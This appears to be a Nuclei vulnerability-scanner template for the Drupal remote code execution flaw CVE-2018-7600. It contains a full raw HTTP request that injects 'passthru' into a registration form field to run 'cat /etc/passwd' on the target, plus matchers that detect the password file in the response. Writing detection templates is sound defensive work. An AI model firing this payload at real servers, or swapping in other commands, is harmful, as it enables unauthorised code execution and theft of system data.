65 lines
2.0 KiB
YAML
65 lines
2.0 KiB
YAML
id: CVE-2018-7600
|
|
|
|
info:
|
|
name: Drupal - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-7600
|
|
cwe-id: CWE-20
|
|
tags: cve,cve2018,drupal,rce
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json
|
|
Referer: {{Hostname}}/user/register
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
|
|
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#post_render][]"
|
|
|
|
passthru
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#type]"
|
|
|
|
markup
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#markup]"
|
|
|
|
cat /etc/passwd
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="form_id"
|
|
|
|
user_register_form
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="_drupal_ajax"
|
|
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/13
|